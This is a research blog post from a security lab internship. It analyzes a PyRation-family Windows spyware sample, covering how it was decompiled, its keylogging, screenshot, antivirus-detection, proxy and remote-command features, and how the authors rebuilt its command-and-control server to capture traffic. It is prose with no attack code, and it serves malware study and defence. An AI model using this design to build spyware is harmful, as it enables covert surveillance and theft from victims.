This blog was authored by Tomas Nieponice on February 23, 2024
This work was made in the context of a 3-week winter cybersecurity internship by the author at the Stratosphere Laboratory, which involved learning about networking, malware reversing, programming and science communication. The internship was done under the supervision of Assist. prof. Sebastian Garcia, Ph.D., and Veronica Valeros, Eng.
This blog is about the technical analysis of a malware we believe to be a variant of the “PyRation” family, with the MD5 hash ‘67e77dcdbf046a0fd91a0bbb3e807831’ and SHA256 bba407734a2567c7e22e443ee5cc1b3a5780c9dd44c79b4a94d514449b0fd39a. The malware is a Python executable packaged as a Windows PE file, meaning it works only on Windows. The final objective of this project was to read and analyze network traffic from the operating malware.
Throughout the course of the blog, I will talk about how it spies and steals information from the target computer and also uses it to conduct anonymous browsing. I will also talk about how all these features are implemented and how it’s all structured via a client that works from the target computer, a server, and a Botmaster. Another topic will be how we got from the executable to a readable Python script by extracting the files from the .zip file and decompiling said files.
To read and analyze this malware implies reconstructing the missing parts and fixing the non-working ones. This required fixing the parts of the client that did not work and creating from scratch the server and Botmaster.
The first thing we did was unzip the .zip file that we received to analyze, in this case, called original-malware.zip. From this unzipping action, we got back a new file called bba407734, as shown in Figure 1.
After obtaining this file, we checked its contents to find out it is indeed a Python executable packaged as a Windows PE file. For this, we used the terminal command ‘strings -n 10 bba407734a | sort | uniq -c| sort -rn | less’.
After this, we used the tool pyinstxtractor [1] to extract all the files inside ‘bba407734’, as shown in Figure 2. The output of this is many files with many different file types. Among these, there were .dll files, .pyd files, and, more importantly, .pyc files, which means Python compiled. This meant that from these files, we could decompile them into actual scripts.
As said in the terminal output, we can use a decompiler to decompile the .pyc files. In this case, we used decompyle3 [2]. However, before decompiling, we need to be in the bba407734a_extracted folder. After which, we can create a folder called ‘decompiled’ to store all the files in as shown in Figure 3.
After this, we can decompile using decompyle3 and save them to the compiled folder using ‘decompyle3 *.pyc -o decompiled’. From this process, we have obtained many Python scripts. For our purposes, the only file out of these we are going to be using is “main.py”, which is the client side of the malware.
From this script, we found what library it uses for server-client connection, which is Socket.IO [3]. Socket.IO is a library that enables low-latency, bidirectional, and event-based communication between a client and a server.
Once we had the decompiled Python code, we analyzed it and extracted all the core functionality of the malware, which is described in detail in the following subsections.
Screenshot
One of the program’s three ‘core’ functions is to take and send screenshots from the client to the server. By ‘core functions’, we don’t mean the most important, but that they run all the time without instructions from the server.
This function makes use of the pillow [4] (or PIL) library for taking screenshots. The interval for these screenshots is every 10 minutes. The interval for the screenshot taking is 10 minutes by default. However there is a functionality to access a configuration file in the server, so when the client connects, it gets from the server the latest value. This is so that if the client is outdated, it can update itself when run. When run on macOS, permissions are required for taking screenshots.
Lastly, the limit size for any type of data sent through the Socket.IO library is 1 MB. This means that after a certain size, the screenshots won’t be sent. However, since this size varies depending on what is on the screen, a small resolution (600×600) was chosen for the screenshot as shown in Figure 4 so as not to go over 1MB in any case.
AV Detection
The second of the three ‘core’ functions is to detect whatever antiviruses are installed in the target computer at the moment of connection. This function makes use of the window_tools [5] library to detect the installed antiviruses. The documentation for windows_tools shows that it detects 18 different types of antiviruses.
As this library is Windows-only, it can’t run on other operating systems. Because of this, before running the antivirus detection, it checks that the OS is Windows (Figure 5).
As we wanted to run this function on macOS, we modified it to check in different directories for keywords that indicate there is an antivirus installed. Of course, we still check if the OS is macOS as shown in Figure 6, just in case.
Keylogger
The last ‘core’ function of the malware involves the capability to record key presses and subsequently store them in a designated variable. This functionality relies on the implementation of the pynput [6] library’s Listener object, which serves the purpose of actively monitoring and capturing key presses across various applications running on the infected system. It is essential to note that this particular process necessitates specific permissions on MacOS. Because the malware is designed to run on Windows, the permissions required are not an issue.
The function responsible for transmitting the key logs operates within a loop that executes every minute. Within this loop, a crucial time-check mechanism is employed to assess the duration elapsed since the occurrence of the last key press. If this duration exceeds 8 seconds, the key log data is sent to the server as shown in Figure 7. Again, the 8 seconds can be modified by the server same as with the screenshots
Notably, it is important to highlight that the malware refrains from locally storing the key log information, opting instead to maintain all gathered data on the remote server. This strategic decision enhances the malware’s covert nature and minimizes the risk of detection through local analysis, underscoring the sophistication and intent behind its design.
File Management Functions
As well as the three previously mentioned ‘core’ functions, the client has functions that receive a message from the server, and it is processed in the bot. Two of the three functions are for file ‘management’. The first function is designed to download a file from the server to the bot. The only parameter needed is the filename, and it is given by the server. First, the server sends the command ‘pull_file_http’ with the name as a parameter, then the malware requests this file from the server, then, the server sends the file to the malware as displayed in Figure 8.
The second function for file management is meant to write a completely new file in the malware. The parameters for this function are a filename and some content. Same as before, these are given by the server. First, the server sends the message ‘save_file_from_socket’, with both parameters, then the bot saves the file on disk.
These two functions, coupled with an upcoming one, can serve the purpose of installing new malware or running scripts remotely.
Anonymous Browsing
The malware’s pivotal feature is its ability to use the target computer as a proxy, sending requests to any specified URL. This enables anonymous browsing for the attacker from an external device (Figure 9).
The server sends parameters, including URL, method, headers, and payload, prompting the malware to execute the request from the infected system. Upon successful connection, the output is relayed back to the server, facilitating discreet and remote browsing.
Remote Command Execution
The last functionality this malware has is the capability to receive and execute command line commands. The specific command is given by the server and then executed. The output received is then sent back to the server as shown in Figure 10 and stored there. This function, coupled with the file writing functions, makes it possible to install new malware/software and run it as pleased.
There is also a special command written in the code that checks the version of the client, the command is called ‘version’ (this is most likely because the client obtained is not the final version and may be updated). As with the keylogging function, no local archive of command outputs is kept.
With all these functions explained the functionality of the client can be seen in the diagram below, which can be accessed in full resolution here.
The whole malware operation consists of three crucial parts: the Botclient (called malware before), the server, and the Botmaster. These components are what make possible the back-and-forth information exchange that the malware requires to function properly and achieve its goal as spyware.
BotClient
The Botclient component of the malware operates within the confines of the targeted computer, initiating its execution whenever the original Python executable is launched. Its functionality becomes immediately apparent as it establishes a connection upon activation. An integral aspect of its operational design is the assignment of a distinct Session ID (SID) upon initiation. This unique identifier serves as a critical feature, enabling the malware to be distinguished from other infected computers within a network or system.
Server
The server does not exist in the original malware ZIP file, so we had to recreate it from scratch in order to have a functional setup. Therefore, most of the decisions on how to implement each function are my own decisions.
The server, also known as the Command and Control Server, functions remotely, operating from a computer located anywhere in the world. It has the flexibility to be executed directly from the attacker’s personal computer or a remote server, adding a layer of versatility to its deployment. Notably, the server maintains continuous operation, persistently active to receive and process data from the infected clients. One significant advantage lies in its automatic restarting mechanism, allowing for local adjustments to its code without the need to break the connections already established. This is an automatic feature of Socket.IO that every time the file is saved, the code is reloaded. This ensures that even if modifications are made to the server’s codebase, the updates are applied automatically.
Botmaster
The Botmaster also did not originally exist in the ZIP file of the malware. However, we need a way to send commands to the BotClients, and therefore, we estimated that a component like this would exist. I created the Botmaster from scratch.
The crucial role of the Botmaster within the context of this malware operation involves being the entity responsible for sending commands to any client connected to the central server. Serving as the orchestrator of the entire botnet, the Botmaster holds a position of command and control, directing the activities of the infected computers under their influence. This authority enables the Botmaster to issue commands that trigger specific actions such as remote command running and anonymous browsing.
To achieve our goal of being able to capture the network traffic of this malware, we had to reconstruct the components. This process involved fixing the client to make it work in our OS architecture, recreating the server, and also the Botmaster.
Fixing the Botclient
The first and most important thing in fixing the client was understanding how it worked. This meant understanding the purpose of each function it possessed. For this, a diagram was made to help visualize all the components of the client. For the last part, we modified the functions that were exclusive to Windows to test the client on macOS and successfully run them.
Note: it still needs permission from the user for the malware to gather all the information, basically useless to run on macOS unless used for testing.
(Re)creating server
With the client code as a starting point, we then needed to get a good understanding of the functionality of the Socket.IO library. This is required to know how and when to send each command and/or action, as well as how to receive them. With both the code and the library understood, we could then successfully implement the server.
At the moment of implementing the server-side code, we noticed that there was a recurring issue when trying to gather user input. We found that the Socket.IO library impedes user input from being entered (or at least there is no easy way to enter it). With this in mind, we created an easy way to enter user input which is via the Botmaster.
Creating the Botmaster
Based on Socket.IO problems to let the server take user input, we implemented the Botmaster: a specialized client whose only purpose is to take user input from the attacker, such as a command or a function, and send it to the server for execution. After this process, the client sends back the output, and it is stored in the server (the response never gets to the Botmaster).
The Botmaster itself may not be the actual way the real attacker uses to send commands as this was just our solution to the problem of getting user input. Nonetheless, since our goal is just to make it run, the solution is good enough.
To this point, we have only done one capture of the network traffic that has not been analyzed yet. It can be found here. The Stratosphere Laboratory is expected to follow up with more captures and analyses shortly.
In conclusion, the analysis and understanding of the malware executable from the PyRation family have provided valuable insights into its operations and functionalities. We’ve been able to understand and recreate the malware functionality from the original client’s code, as well as adapting it to run on multiple OSs. All files discussed in the blog are public in this GitHub repository: https://github.com/stratosphereips/Malware-CC-Recovery.